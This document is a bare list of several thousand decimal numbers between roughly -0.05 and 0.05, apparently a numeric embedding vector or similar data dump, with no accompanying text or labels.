-0.0037332684732973576, 0.003255882067605853, 0.007502296008169651, 0.0071983421221375465, -0.00371181289665401, -0.007323499768972397, 0.015505222603678703, -0.00971221923828125, -0.021169491112232208, 0.014761429280042648, 0.003600959200412035, -0.0006852371152490377, 0.00229216949082911, 0.004913324490189552, -0.011836320161819458, 0.010184241458773613, 0.000030283637897809967, -0.009311715140938759, 0.0021741639357060194, -0.006254297215491533, 0.0007715063984505832, 0.015734082087874413, -0.015290666371583939, 0.030838800594210625, 0.026089968159794807, -0.024888455867767334, -0.023529604077339172, 0.013202324509620667, 0.008067293092608452, -0.02365833707153797, 0.011106831021606922, 0.01889520138502121, -0.01833735592663288, 0.017293186858296394, -0.008818237110972404, 0.020954936742782593, -0.009211589582264423, -0.0036385064013302326, 0.011686131358146667, 0.03321321681141853, 0.004105164669454098, 0.04265366494655609, 0.010227153077721596, 0.01770799420773983, 0.01316656544804573, 0.0001389024400850758, -0.022742899134755135, 0.007538055535405874, 0.018680645152926445, 0.0013114714529365301, -0.017879638820886612, 0.014017635956406593, 0.0022313788067549467, -0.008689504116773605, -0.016935592517256737, -0.005732211750000715, 0.023772766813635826, 0.010398797690868378, -0.0032111830078065395, -0.0015698322094976902, 0.020969239994883537, -0.012737453915178776, -0.02136974409222603, -0.004641553852707148, -0.01438953261822462, -0.004305416718125343, -0.0008944288711063564, -0.0007236783276312053, 0.00011035089119104668, 0.009376082569360733, -0.020196838304400444, -0.0370752178132534, 0.004873989149928093, -0.01109967939555645, -0.003525864565744996, -0.0199250690639019, 0.0208118986338377, 0.012437076307833195, 0.0019792758394032717, 0.03398561477661133, 0.029351213946938515, 0.0029179570265114307, 0.01662091165781021, -0.002361900173127651, -0.002218862995505333, -0.015490918420255184, -0.0045342762023210526, 0.004151652101427317, 0.010520379059016705, 0.007645333185791969, -0.006669105030596256, 0.0021795278880745173, 0.011886383406817913, -0.026247309520840645, -0.00559275085106492, 0.0006092486437410116, -0.016706733033061028, -0.008432037197053432, 0.037904832512140274, -0.0031271486077457666, 0.004902596585452557, 0.0025836077984422445, 0.015734082087874413, -0.0052458858117461205, 0.008646593429148197, -0.0054389857687056065, 0.010649112053215504, -0.01493307389318943, 0.017007112503051758, -0.006779958959668875, 0.032354991883039474, -0.010019749402999878, 0.000978910131379962, 0.01863773539662361, -0.001939940731972456, -0.013338210061192513, 0.004913324490189552, -0.03026665188372135, 0.017779512330889702, -0.00878962967544794, 0.012837580405175686, -0.0195531714707613, 0.005428258329629898, 0.0032201227732002735, -0.019281402230262756, -0.023172011598944664, -0.014918769709765911, 0.016535088419914246, -0.008775326423346996, 0.004144500009715557, -0.00474167987704277, 0.009640701115131378, -0.00742362579330802, 0.02719135396182537, 0.0257323756814003, 0.027963753789663315, 0.01672103814780712, 0.009547727182507515, 0.0006727213622070849, 0.00812450796365738, -0.005496200639754534, 0.010692023672163486, 0.004684465005993843, 0.014489659108221531, 0.012379861436784267, 0.0206831656396389, 0.01962469145655632, -0.012508594430983067, -0.002987687475979328, -0.0174076147377491, 0.010484619997441769, -0.008281848393380642, 0.01537648867815733, -0.015519525855779648, -0.012651631608605385, -0.0010843999916687608, 0.01697850413620472, -0.017321793362498283, -0.001766508212313056, -0.006865780800580978, 0.008668048307299614, 0.011028160341084003, 0.008117355406284332, 0.0027802838012576103, -0.011113982647657394, 0.013345361687242985, -0.02078329212963581, 0.017893942072987556, 0.00402291864156723, 0.003697509178891778, -0.0019506685202941298, -0.02045430615544319, 0.0065010362304747105, -0.010734934359788895, 0.0016458206810057163, -0.004448453895747662, -0.004977691452950239, -0.010420253500342369, 0.007788370363414288, -0.0022331667132675648, -0.011514486744999886, -0.00857507437467575, -0.004616522695869207, 0.007988622412085533, 0.007487992290407419, -0.02111227624118328, 0.002660490106791258, -0.013352513313293457, 0.003980007488280535, 0.0020811897702515125, -0.010563289746642113, 0.014132065698504448, -0.005810882430523634, -0.010520379059016705, 0.0019953676965087652, -0.021355438977479935, -0.012143850326538086, -0.003627778496593237, -0.00832475908100605, 0.0016279410338029265, -0.009311715140938759, -0.013795929029583931, 0.001778129953891039, 0.01697850413620472, 0.0012640904169529676, -0.008932666853070259, -0.007487992290407419, -0.0026837335899472237, 0.0011246292851865292, -0.003168271854519844, 0.025460604578256607, 0.015448007732629776, 0.014418140053749084, 0.009068552404642105, -0.004981267265975475, 0.001062050461769104, 0.008024381473660469, -0.00836051907390356, -0.0263617392629385, 0.001314153429120779, -0.012272583320736885, 0.012029420584440231, -0.013738714158535004, 0.014503962360322475, 0.00088057218817994, -0.002540696645155549, 0.003356008091941476, -0.017622170969843864, 0.016063066199421883, 0.0008273802231997252, -0.0071768867783248425, -0.0023243529722094536, 0.01632053405046463, -0.007001666352152824, 0.013216628693044186, -0.0398501381278038, -0.015977244824171066, -0.012000813148915768, -0.004823926370590925, 0.02028266154229641, -0.022742899134755135, -0.0053138285875320435, -0.011485879309475422, -0.007566662970930338, -0.018094193190336227, 0.016048762947320938, 0.00353838037699461, 0.011621764861047268, 0.003091389313340187, 0.011299931444227695, -0.007888495922088623, -0.01667812652885914, -0.019610386341810226, -0.0006405380554497242, 0.04093721881508827, 0.00012359299580566585, -0.01922418735921383, -0.02633313089609146, 0.00631866417825222, -0.020997846499085426, -0.007344955112785101, 0.004877565428614616, -0.0157626885920763, 0.01088512409478426, 0.026318827643990517, -0.015648258849978447, -0.01217245776206255, -0.035816490650177, 0.006104108411818743, 0.01177910529077053, -0.014360925182700157, 0.001676216023042798, 0.023572515696287155, -0.0021670120768249035, 0.02490275911986828, -0.009418993256986141, 0.008889756165444851, -0.0034954692237079144, 0.002177739981561899, 0.013767321594059467, 0.0021759518422186375, 0.003200455103069544, -0.003084237454459071, 0.008596530184149742, -0.010806453414261341, 0.02903653308749199, 0.0020847658161073923, -0.005346011836081743, -0.01314510963857174, -0.01813710480928421, 0.007995774038136005, 0.01355991791933775, -0.014225039631128311, 0.007487992290407419, -0.01705002225935459, -0.018837986513972282, 0.007262709084898233, 0.007716851774603128, 0.01780811883509159, 0.016005851328372955, -0.00317542371340096, 0.016763947904109955, -0.0071983421221375465, -0.013359665870666504, -0.01667812652885914, -0.010198545642197132, -0.00817457027733326, 0.012751758098602295, 0.02514592371881008, 0.0032093951012939215, 0.0023082613479346037, 0.0041659558191895485, 0.011228412389755249, 0.00351871270686388, -0.018551912158727646, 0.0024334187619388103, 0.010384493507444859, 0.018380267545580864, 0.0019882158376276493, 0.020425697788596153, -0.010670567862689495, -0.012544354423880577, 0.006980210542678833, -0.011471576057374477, -0.002131252782419324, -0.005646389909088612, -0.0192957054823637, 0.005360315553843975, 0.0038119389209896326, -0.015362185426056385, -0.016234710812568665, -0.011485879309475422, -0.009233045391738415, 0.0018666342366486788, 0.00009649417188484222, -0.018122801557183266, 0.001595757668837905, -0.013466943055391312, 0.016334837302565575, 0.004398391116410494, 0.009676460176706314, 0.0008103945874609053, -0.005803730338811874, -0.04328302666544914, -0.018809380009770393, 0.010005445219576359, 0.0005350481951609254, 0.0017325369408354163, -0.010963793843984604, 0.00635084742680192, -0.014139218255877495, 0.004241050221025944, -0.01062050461769104, 0.014110610820353031, -0.013674347661435604, 0.013831688091158867, 0.012944857589900494, 0.0008461538818664849, 0.03415726125240326, -0.008753870613873005, -0.005145759787410498, 0.002299321349710226, 0.00823893677443266, 0.01124986819922924, 0.005617782473564148, -0.016463570296764374, 0.008503556251525879, 0.0005153805832378566, -0.00742362579330802, 0.016034459695219994, 0.004820350557565689, -0.03284131735563278, 0.009368930011987686, -0.009426144883036613, -0.0017522044945508242, 0.00333276460878551, -0.027591858059167862, 0.005446137860417366, 0.025718070566654205, 0.008432037197053432, 0.024273397400975227, -0.014732821844518185, -0.000026400402930448763, 0.0011299931211397052, 0.007559510879218578, -0.022156447172164917, -0.016005851328372955, -0.0011228412622585893, 0.033842578530311584, 0.025975538417696953, 0.012265431694686413, -0.004612946417182684, 0.002013247227296233, 0.0013847779482603073, 0.004344752058386803, 0.0062042344361543655, -0.026147183030843735, 0.00933317095041275, -0.00024293958267662674, -0.0009342110715806484, -0.02101214975118637, 0.02071177214384079, -0.007845585234463215, -0.011614613234996796, -0.015805600211024284, -0.014904466457664967, -0.005328132305294275, -0.017893942072987556, 0.0026747938245534897, 0.02154138870537281, 0.01569117046892643, 0.023400871083140373, 0.027734894305467606, 0.014124914072453976, 0.007008817978203297, -0.0073521072044968605, -0.0009132025297731161, -0.01662091165781021, -0.010484619997441769, 0.008031533099710941, 0.00842488557100296, -0.01445389911532402, 0.005231582093983889, -0.0005202974425628781, 0.01978203095495701, -0.02500288560986519, -0.016535088419914246, -0.003604535013437271, 0.00804583728313446, -0.0042517781257629395, 0.0019828518852591515, 0.017221666872501373, 0.016206104308366776, -0.006332967896014452, -0.007473688572645187, -0.002728432882577181, 0.01687837764620781, -0.03332764655351639, 0.003994311206042767, 0.0017986915772780776, -0.005274493247270584, 0.004287537187337875, -0.00009766752191353589, -0.01737900823354721, 0.0017173392698168755, -0.005485472735017538, 0.001325775170698762, -0.002978747710585594, 0.012000813148915768, -0.0010414889547973871, 0.0019953676965087652, 0.01223682425916195, 0.027734894305467606, 0.017092933878302574, 0.00036049820482730865, 0.016392052173614502, 0.029379820451140404, 0.004194563254714012, -0.006787110585719347, -0.004941931925714016, -0.023515300825238228, 0.023629730567336082, 0.008417733944952488, -0.0020865537226200104, -0.00474883196875453, 0.0028839856386184692, 0.030352473258972168, 0.006883660797029734, -0.0013901419006288052, 0.001763826352544129, 0.006325815804302692, -0.018981024622917175, 0.002479905728250742, -0.0017933277413249016, 0.009161526337265968, -0.03295574709773064, 0.00911861564964056, -0.016964200884103775, -0.005796578712761402, 0.0062221139669418335, 0.014661302790045738, -0.008853997103869915, -0.008546466939151287, -0.004380511119961739, -0.007330651395022869, -0.026933886110782623, -0.010298671200871468, 0.02464529313147068, -0.0035634117666631937, 0.005560567602515221, 0.01896671950817108, 0.009490512311458588, 0.006647649221122265, -0.008832541294395924, 0.0034740136470645666, -0.016892682760953903, -0.007080336567014456, -0.005556991323828697, -0.00531025230884552, 0.008482100442051888, -0.018909504637122154, 0.011378602124750614, 0.015548133291304111, 0.0029805356170982122, 0.004065829794853926, -0.01647787354886532, -0.013452639803290367, 0.0029251088853925467, 0.014124914072453976, 0.01813710480928421, 0.011421512812376022, -0.02943703532218933, -0.0017924336716532707, 0.009554878808557987, -0.01062050461769104, -0.0019113332964479923, -0.029050836339592934, 0.002826770767569542, 0.001947092590853572, 0.006121987942606211, 0.007087488658726215, 0.003593807341530919, 0.0074593848548829556, -0.011493030935525894, -0.007781218271702528, -0.008496403694152832, -0.026204397901892662, 0.017364704981446266, 0.014124914072453976, 0.011442968621850014, -0.008532163687050343, -0.015977244824171066, -0.00023310577671509236, -0.008281848393380642, 0.009697915986180305, 0.008861148729920387, 0.001846966566517949, 0.0010227153543382883, -0.004766711499541998, 0.002399447374045849, -0.0025460603646934032, 0.035730667412281036, 0.03484383970499039, 0.00719476630911231, -0.0022403185721486807, -0.004151652101427317, 0.018451785668730736, 0.01806558668613434, -0.00794571079313755, -0.009969686158001423, -0.0023315048310905695, 0.033413466066122055, 0.014568328857421875, 0.009819497354328632, 0.009125767275691032, -0.004959811456501484, -0.001963184215128422, 0.03312739357352257, 0.0014455687487497926, 0.015619651414453983, 0.00023958715610206127, -0.007845585234463215, 0.010019749402999878, 0.0035830794367939234, -0.01546231098473072, -0.015047503635287285, -0.016177495941519737, 0.010820756666362286, 0.016921289265155792, -0.008725263178348541, -0.005349587649106979, 0.001050428720191121, 0.0020633102394640446, 0.001947092590853572, 0.033413466066122055, -0.012265431694686413, 0.006232841871678829, -0.011736194603145123, -0.01034158281981945, 0.007409322075545788, 0.007774066645652056, 0.02242821827530861, -0.022356700152158737, 0.01978203095495701, 0.009390385821461678, -0.004344752058386803, -0.024731114506721497, 0.0008148645283654332, 0.013280995190143585, -0.013102198950946331, 0.00701239425688982, -0.01559104397892952, -0.007602422032505274, -0.016692429780960083, -0.003343492280691862, 0.013738714158535004, 0.01285188365727663, -0.01720736362040043, 0.024559471756219864, -0.0022850176319479942, 0.006100532598793507, 0.0003873176465276629, -0.02154138870537281, -0.03238360211253166, -0.022056320682168007, 0.0018952416721731424, 0.018823683261871338, 0.0003182575455866754, -0.02035417966544628, -0.02557503432035446, 0.017693689092993736, 0.0029322607442736626, 0.01210809126496315, -0.0023279287852346897, -0.0027051891665905714, -0.020525824278593063, 0.009733675047755241, 0.00493835611268878, 0.000016007863450795412, -0.015805600211024284, 0.016177495941519737, -0.00796001497656107, 0.009311715140938759, 0.01579129695892334, -0.012673087418079376, -0.006250721402466297, 0.019681906327605247, -0.0028571661096066236, -0.00916867796331644, -0.0032344264909625053, -0.034271690994501114, -0.021755943074822426, 0.0033971313387155533, -0.006325815804302692, -0.01642065867781639, 0.0008063716813921928, 0.006454549264162779, -0.010756390169262886, -0.01402478851377964, -0.023672640323638916, 0.011307083070278168, -0.00804583728313446, 0.02378707006573677, -0.003252306254580617, 0.015405096113681793, 0.008403429761528969, 0.008439188823103905, -0.02285732887685299, -0.010141330771148205, -0.02424478903412819, -0.005578447133302689, 0.014503962360322475, 0.017293186858296394, -0.011893535032868385, -0.017421919852495193, 0.0335565060377121, -0.017364704981446266, -0.013717258349061012, 0.01278751716017723, -0.00314324046485126, -0.004491365049034357, -0.007466536946594715, 0.021684424951672554, -0.0012095575220882893, -0.005564143415540457, 0.00933317095041275, -0.000003918155016435776, -0.003715388709679246, -0.0012819700641557574, -0.0035723517648875713, 0.011814865283668041, -0.009640701115131378, -0.02752033807337284, -0.03750433027744293, -0.01622040756046772, -0.01546231098473072, 0.015333577990531921, -0.01131423469632864, 0.001055792672559619, 0.009633548557758331, 0.00826039258390665, 0.013402576558291912, 0.004530700389295816, 0.006315088365226984, -0.02184176631271839, 0.014475354924798012, 0.0051421839743852615, 0.02217075042426586, -0.007495144382119179, -0.0195531714707613, -0.026047056540846825, 0.005185095127671957, -0.0203112680464983, -0.011493030935525894, -0.015934333205223083, -0.010842212475836277, 0.015362185426056385, -0.0062721772119402885, 0.008946971036493778, 0.017421919852495193, -0.022042017430067062, -0.01514762919396162, -0.01619180105626583, -0.01493307389318943, 0.017722297459840775, 0.00948335975408554, 0.005725060123950243, 0.01609167456626892, -0.01612028107047081, -0.019467350095510483, -0.0015430127969011664, 0.00911861564964056, 0.022485433146357536, 0.0008828071295283735, -0.02174163982272148, 0.009354626759886742, -0.01725027523934841, 0.0180369783192873, 0.0008121825521811843, -0.003908488899469376, -0.01177910529077053, 0.006965906824916601, 0.0032201227732002735, 0.004691617097705603, 0.008160267025232315, 0.006615465972572565, 0.016034459695219994, 0.008517859503626823, -0.01483294740319252, 0.011042464524507523, 0.031210696324706078, 0.0017092934576794505, 0.014675606973469257, 0.021856069564819336, -0.0023565362207591534, -0.006261449307203293, 0.012151001952588558, 0.005346011836081743, -0.0028678940143436193, 0.007588118314743042, 0.006905116140842438, -0.009440449066460133, 0.0008917469531297684, -0.013531310483813286, -0.012794668786227703, 0.011621764861047268, 0.0075452071614563465, -0.013967573642730713, -0.0069837868213653564, -0.0060290140099823475, 0.0033971313387155533, 0.003347068326547742, -0.007666788995265961, 0.02626161277294159, -0.0055069285444915295, 0.007988622412085533, 0.022542648017406464, -0.005839489866048098, 0.005564143415540457, 0.012315494939684868, 0.005045633763074875, -0.016763947904109955, 0.014975984580814838, -0.007538055535405874, -0.005732211750000715, -0.001416961313225329, -0.011128286831080914, -0.008474948816001415, 0.006164899095892906, -0.03713243082165718, 0.029522858560085297, -0.016635214909911156, -0.005885976832360029, -0.0018827258609235287, -0.0056642694398760796, -0.0016136373160406947, 0.018194319680333138, -0.036617498844861984, -0.002224226947873831, -0.030438296496868134, 0.0014294770080596209, 0.025975538417696953, 0.011950749903917313, -0.024158967658877373, -0.0016368809156119823, 0.0037547240499407053, -0.017765209078788757, -0.0019202731782570481, -0.009211589582264423, -0.0063973343931138515, -0.002297533443197608, -0.012408468872308731, -0.021655818447470665, -0.008231785148382187, -0.0045128208585083485, -0.02008240856230259, 0.01902393437922001, 0.027177050709724426, -0.032097525894641876, 0.004484213422983885, 0.011128286831080914, 0.000532813195604831, 0.009354626759886742, -0.013416880741715431, -0.004541428294032812, -0.019038239493966103, 0.013695802539587021, -0.001963184215128422, 0.01200796477496624, 0.00030350685119628906, 0.014003332704305649, 0.003894185181707144, -0.012093787081539631, -0.017092933878302574, -0.004798894748091698, 0.00023534073261544108, -0.016864074394106865, -0.000012627494470507372, 0.00296980794519186, 0.013173717074096203, -0.005556991323828697, 0.024688204750418663, -0.004659433849155903, 0.030781585723161697, -0.004237474408000708, -0.013044984079897404, -0.026347434148192406, 0.009554878808557987, 0.002644398482516408, -0.013738714158535004, 0.007248405367136002, -0.012201065197587013, -0.010134179145097733, 0.0187950748950243, -0.0007116096094250679, -0.008167418651282787, 0.009783738292753696, 0.012458532117307186, -0.004695192910730839, -0.0016547604463994503, 0.02071177214384079, 0.0017834939062595367, -0.0026837335899472237, -0.00719476630911231, -0.00857507437467575, 0.010956642217934132, 0.016492178663611412, 0.005235157907009125, -0.007380714640021324, -0.009011337533593178, -0.005059937480837107, 0.000186730467248708, -0.004695192910730839, -0.005303100682795048, -0.005539111793041229, 0.00041033769957721233, 0.016163192689418793, -0.004351903684437275, 0.005363891366869211, 0.00934747513383627, -0.010913731530308723, 0.01909545436501503, -0.00015331790200434625, 0.010541834868490696, 0.0030341746751219034, 0.004924052394926548, -0.012508594430983067, -0.00028294528601691127, -0.02164151333272457, -0.016206104308366776, 0.0050742411985993385, -0.002755252178758383, 0.000049811555072665215, -0.01796546019613743, -0.02676224149763584, 0.01084936410188675, -0.004673737566918135, 0.020997846499085426, 0.0015582104679197073, -0.005878825206309557, 0.013595676980912685, 0.00956203043460846, 0.01793685369193554, -0.008682352490723133, 0.021083669736981392, 0.016277622431516647, 0.016935592517256737, 0.005306676495820284, 0.005621358286589384, -0.007831281051039696, 0.0020007314160466194, -0.019181275740265846, -0.014575481414794922, 0.011979357339441776, 0.007559510879218578, -0.011378602124750614, 0.008732414804399014, -0.012100938707590103, 0.015519525855779648, 0.0221993587911129, -0.004691617097705603, -0.019238490611314774, 0.006647649221122265, 0.015877118334174156, 0.0005270023248158395, -0.00474167987704277, -0.025489212945103645, -0.0215699952095747, -0.01546231098473072, 0.013388273306190968, 0.009204437956213951, -0.012494291178882122, -0.017221666872501373, 0.008525011129677296, -0.01398902852088213, -0.013109350576996803, 0.017622170969843864, -0.0018791499314829707, 0.007588118314743042, 0.01644926704466343, 0.020726077258586884, -0.022514039650559425, -0.00405510189011693, -0.014639847911894321, 0.008546466939151287, 0.0011282052146270871, -0.0039227926172316074, -0.01833735592663288, -0.012351254001259804, 0.01889520138502121, -0.0064652771688997746, 0.0023011094890534878, 0.007223373744636774, -0.005911008454859257, -0.002653338247910142, -0.00562493409961462, 0.003722540568560362, 0.018451785668730736, 0.0016368809156119823, 0.030381081625819206, 0.0036617498844861984, 0.006733471527695656, -0.007623877841979265, 0.025889715179800987, 0.004734528250992298, -0.012587265111505985, -0.008603681810200214, 0.003972855396568775, -0.006104108411818743, 0.011285627260804176, -0.009161526337265968, -0.019681906327605247, 0.03264106810092926, 0.016792556270956993, -0.024559471756219864, 0.019939372316002846, -0.011049616150557995, 0.004140924196690321, 0.019810639321804047, 0.005703604314476252, 0.013366817496716976, 0.008474948816001415, 0.00826039258390665, -0.011135438457131386, -0.003937096334993839, -0.0033756757620722055, 0.01516193337738514, -0.0007585436687804759, -0.008625137619674206, -0.010305823758244514, 0.003847698215395212, -0.008482100442051888, 0.006844325456768274, 0.019667601212859154, -0.012651631608605385, -0.0172788817435503, -0.024173270910978317, -0.01055613812059164, 0.009912471286952496, -0.008453493006527424, 0.024273397400975227, -0.006683408748358488, 0.007473688572645187, 0.005653541535139084, -0.009361778385937214, 0.015233451500535011, 0.016377748921513557, 0.006951603107154369, 0.007144703529775143, -0.015705473721027374, 0.002487057587131858, -0.0040980130434036255, -0.023672640323638916, -0.017235971987247467, 0.00066467555006966, 0.035301558673381805, 0.01632053405046463, 0.015448007732629776, -0.01747913472354412, -0.007759762927889824, -0.011600309051573277, -0.022714292630553246, -0.0005538217956200242, 0.01177910529077053, 0.024359218776226044, -0.009461904875934124, 0.006640497595071793, -0.00796001497656107, -0.010928034782409668, 0.012844732031226158, 0.011228412389755249, -0.002976959804072976, -0.004988418892025948, -0.005649965722113848, 0.014339469373226166, 0.006536795757710934, -0.013874598778784275, 0.03412865474820137, 0.008646593429148197, -0.011149742640554905, 0.002460238290950656, -0.021226705983281136, 0.003450770163908601, 0.013066439889371395, -0.01602015644311905, 0.0005028648301959038, -0.011607460677623749, -0.017951156944036484, 0.01737900823354721, 0.0016190012684091926, -0.02411605603992939, -0.009912471286952496, -0.0020490065217018127, -0.002467390149831772, 0.009762282483279705, 0.0023279287852346897, 0.00041570159373804927, 0.01040594931691885, -0.0033005811274051666, -0.04991994798183441, 0.009762282483279705, 0.00546759320423007, -0.002699825447052717, 0.018094193190336227, -0.008289000019431114, 0.008117355406284332, 0.007237677462399006, 0.007538055535405874, -0.004005039110779762, -0.009705067612230778, -0.022943152114748955, 0.005042057950049639, 0.007291316520422697, 0.006250721402466297, -0.0007567557040601969, -0.0016046975506469607, 0.010262912139296532, 0.009383234195411205, 0.006529643665999174, 0.006973058916628361, 0.004083709325641394, -0.03667471185326576, 0.004026494454592466, 0.012623024173080921, -0.013409728184342384, 0.006175627000629902, -0.011686131358146667, -0.018094193190336227, 0.005013450514525175, 0.0010951277799904346, 0.00958348624408245, 0.01034158281981945, -0.001929212943650782, -0.005828761961311102, -0.012580113485455513, -0.00389776099473238, 0.0070731849409639835, -0.011714738793671131, 0.004283961374312639, 0.0023440206423401833, -0.000046095941797830164, -0.00017354423471260816, -0.00949766393750906, 0.010627657175064087, -0.011171197518706322, -0.002833922626450658, 0.020826201885938644, -0.0009941079188138247, 0.01377447322010994, -0.012673087418079376, 0.0037475721910595894, 0.014475354924798012, -0.0214412622153759, -0.009819497354328632, 0.020039498805999756, 0.00009794688958209008, -0.017321793362498283, -0.008031533099710941, -0.017193060368299484, 0.009833800606429577, -0.014582633040845394, 0.005710756406188011, -0.007502296008169651, -0.0172788817435503, 0.009368930011987686, 0.01757925935089588, 0.013388273306190968, 0.011493030935525894, -0.005896704737097025, -0.00895412266254425, 0.010084115900099277, 0.005911008454859257, -0.004269657656550407, -0.006783534772694111, -0.005986102856695652, -0.015204844065010548, 0.007745459210127592, -0.006182778626680374, 0.012515746988356113, 0.012143850326538086, -0.006640497595071793, -0.025861108675599098, 0.0002377991913817823, -0.015276363119482994, 0.0016288349870592356, -0.003994311206042767, 0.0031414523255079985, 0.003947824239730835, 0.006279328837990761, 0.0054711694829165936, 0.008289000019431114, -0.008582226000726223, 0.019495956599712372, 0.0034954692237079144, 0.0029644439928233624, 0.004280385561287403, 0.008696655742824078, 0.005585598759353161, 0.007205494213849306, 0.0010370189556851983, -0.013567069545388222, 0.016363445669412613, -0.005202974658459425, -0.009640701115131378, -0.00006917185237398371, -0.006393758580088615, -0.026118574663996696, 0.0025389085058122873, -0.00939753744751215, 0.041909873485565186, 0.006772806867957115, 0.01644926704466343, -0.015533829107880592, -0.026547687128186226, 0.0006780852563679218, 0.00972652342170477, 0.0017799179768189788, -0.019896460697054863, 0.0026801577769219875, -0.022671381011605263, -0.005081393290311098, -0.007026697974652052, -0.005728635936975479, 0.0005073347128927708, -0.002923320746049285, -0.012229672633111477, -0.015648258849978447, -0.01278751716017723, -0.01546231098473072, 0.02824982814490795, 0.015276363119482994, -0.0012846520403400064, 0.0171501487493515, 0.012208216823637486, -0.012093787081539631, 0.0010969158029183745, -0.011214109137654305, 0.022285180166363716, -0.0016377748688682914, -0.009304563514888287, -0.009848104789853096, 0.03484383970499039, -0.0030520542059093714, 0.0066369217820465565, -0.0040300702676177025, -0.022485433146357536, 0.01524775568395853, 0.0039442479610443115, -0.0016073794104158878, -0.00132756307721138, -0.008675199933350086, -0.008904059417545795, -0.0011255232384428382, 0.00418025953695178, -0.012372709810733795, 0.011936446651816368, 0.004802470561116934, 0.001315047382377088, -0.0018988176016137004, 0.00562493409961462, 0.023200618103146553, -0.010763541795313358, 0.018680645152926445, -0.0040300702676177025, 0.005703604314476252, -0.019567476585507393, 0.000972652283962816, -0.006179202813655138, 0.020525824278593063, -0.00631866417825222, 0.018823683261871338, -0.005446137860417366, 0.011271324008703232, -0.017650779336690903, 0.01677825301885605, -0.023944411426782608, -0.020983543246984482, -0.0032809136901050806, -0.012358405627310276, 0.0010236093075945973, -0.0015626803506165743, 0.01579129695892334, -0.014904466457664967, -0.029093747958540916, -0.003808362875133753, -0.0033184608910232782, 0.00741647370159626, -0.0018630583072081208, -0.0019095453899353743, 0.03501548245549202, 0.050234630703926086, 0.001492055831477046, 0.01642065867781639, 0.003529440611600876, 0.0029251088853925467, -0.011278475634753704, -0.0010906578972935677, -0.013581372797489166, -0.007166158873587847, 0.005342436023056507, 0.011285627260804176, -0.00011934658687096089, -0.00512788025662303, 0.0008729733526706696, 0.001319517265073955, 0.006890812423080206, 0.0005252143600955606, 0.014804339967668056, 0.007191190496087074, 0.005953919608145952, 0.003540168283507228, 0.0014589785132557154, 0.011457271873950958, -0.016434963792562485, -0.007845585234463215, 0.0005877931253053248, 0.018551912158727646, 0.004319720435887575, 0.0383339449763298, 0.006265025120228529, 0.006644073408097029, 0.022442521527409554, 0.008331911638379097, -0.004412694834172726, -0.009447600692510605, -0.002390507608652115, 0.012093787081539631, 0.021298224106431007, 0.019495956599712372, -0.0037582998629659414, -0.000421735952841118, 0.01677825301885605, 0.0007710593636147678, 0.014360925182700157, 0.014339469373226166, 0.012873339466750622, -0.0172788817435503, 0.007888495922088623, 0.0002930025802925229, 0.030609941110014915, -0.008961274288594723, 0.003847698215395212, -0.013066439889371395, -0.017851030454039574, 0.0053138285875320435, 0.03261246159672737, -0.00657255481928587, -0.008532163687050343, -0.01225828006863594, -0.0003815067757386714, -0.02002519555389881, -0.01945304684340954, 0.022156447172164917, -0.0005730423727072775, 0.017193060368299484, 0.005911008454859257, 0.007430777419358492, 0.008196026086807251, 0.006486732512712479, 0.0034865294583141804, -0.014053395949304104, 0.023214921355247498, 0.013831688091158867, -0.017750903964042664, -0.00105311069637537, 0.0165207851678133, -0.022871632128953934, 0.004452029708772898, 0.010284367948770523, 0.0025138771161437035, -0.004698768723756075, -0.0069837868213653564, -0.022571254521608353, -0.020668862387537956, 0.004788167309015989, 0.01876646839082241, 0.005796578712761402, -0.015505222603678703, -0.01632053405046463, -0.006086228881031275, -0.015362185426056385, -0.007988622412085533, -0.006304360460489988, -0.004698768723756075, 0.0171501487493515, -0.025131618604063988, -0.01126417238265276, -0.005571295041590929, -0.0014357349136844277, 0.0017271729884669185, 0.004834654275327921, -0.009411841630935669, -0.006615465972572565, -0.02887919172644615, 0.00688008451834321, -0.004069405607879162, -0.014947377145290375, -0.009111464023590088, 0.004691617097705603, -0.00036183916381560266, 0.00421244278550148, -0.016535088419914246, 0.0023493843618780375, 0.032297778874635696, 0.00229574553668499, 0.034700799733400345, -0.0011621764861047268, -0.004834654275327921, 0.02121240273118019, 0.013102198950946331, 0.017350399866700172, -0.0032362143974751234, -0.007048153318464756, 0.0007102686213329434, 0.005167215596884489, 0.006905116140842438, -0.02527465671300888, -0.007058881223201752, -0.009655004367232323, -0.005564143415540457, 0.004473485518246889, -0.004105164669454098, -0.0038298184517771006, 0.00005316398528520949, 0.008782478049397469, 0.01017708983272314, -0.0056642694398760796, 0.011671828106045723, 0.02071177214384079, 0.017235971987247467, -0.006071925163269043, -0.028750458732247353, 0.012379861436784267, -0.00026998252724297345, 0.002748100319877267, 0.005106424447149038, -0.018923809751868248, -0.03521573543548584, -0.0062221139669418335, 0.002914380980655551, -0.004616522695869207, -0.021755943074822426, 0.005456865765154362, 0.015219148248434067, -0.024387827143073082, 0.009447600692510605, 0.013188021257519722, 0.019009631127119064, 0.001421431195922196, -0.012115242891013622, 0.009469056501984596, -0.0001259396958630532, -0.002631882671266794, 0.04145215451717377, -0.021856069564819336, 0.0026765817310661077, -0.02633313089609146, -0.019696209579706192, -0.002376203890889883, -0.0016038034809753299, -0.032583851367235184, 0.00581445824354887, -0.05032045394182205, -0.0187950748950243, 0.009354626759886742, 0.01796546019613743, 0.008832541294395924, 0.010134179145097733, 0.008696655742824078, 0.004462757613509893, -0.0191669724881649, 0.004670161288231611, 0.008846844546496868, 0.01034158281981945, -0.016063066199421883, 0.014539721421897411, 0.022027714177966118, 0.003525864565744996, -0.021226705983281136, 0.04651566594839096, 0.0036545980256050825, 0.006958755198866129, 0.011972205713391304, 0.017164452001452446, 0.02302897348999977, -0.0033953431993722916, -0.0075952704064548016, -0.01430371031165123, 0.006486732512712479, 0.003879881463944912, -0.005378195084631443, 0.015776991844177246, -0.008439188823103905, 0.0018594823777675629, 0.003965703770518303, -0.006751351524144411, 0.0019220610847696662, -0.040222033858299255, -0.016363445669412613, -0.006197082344442606, -0.00045034338836558163, 0.014439595863223076, -0.027177050709724426, 0.0010209273314103484, -0.0006870250799693167, -0.009283107705414295, -0.0062721772119402885, 0.011364297941327095, -0.005889552645385265, 0.022556951269507408, -0.015676867216825485, -0.016463570296764374, 0.012909098528325558, 0.004920476581901312, 0.011407208628952503, 0.01876646839082241, 0.022256573662161827, -0.0026229429058730602, -0.006479580886662006, -0.009991141967475414, 0.01672103814780712, -0.004612946417182684, -0.005063513293862343, 0.009855256415903568, -0.004044373985379934, 0.00020271039102226496, 0.010749238543212414, -0.0028535902965813875, 0.0019041814375668764, 0.002454874338582158, 0.01730749011039734, 0.0011934658978134394, 0.0001680685963947326, 